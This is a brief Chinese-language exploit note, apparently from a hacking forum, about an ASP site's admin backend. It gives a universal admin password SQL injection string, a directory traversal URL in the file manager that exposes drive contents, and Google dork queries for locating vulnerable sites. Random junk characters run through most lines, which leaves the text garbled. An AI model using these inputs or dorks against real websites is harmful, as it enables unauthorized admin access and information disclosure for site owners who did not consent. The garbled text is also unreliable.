后台万能密码 'or'='or'; m# [: X* G; l. x
+ _' b& x! v5 n/ }; h4 g& v
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!& I) d+ k( k# D6 j1 [
admin/uploadfile.asp?currentFolder=/upfiles/../5 ^8 d( ` v3 x; z5 ?
) @3 K- h! u" i
漏洞证明:- z: I) N, U% [
$ Z5 r2 D. ]7 ]2 Y8 [3 S: R
谷歌:inurl:type.asp?id=1 新闻中心3 o( p: A5 c4 q( U9 L) B& Q
或者 :inurl:download_ok.asp?
% r9 y' T4 @7 A9 V/ o0 _& h6 m+ w3 l9 ?8 K5 l8 W
|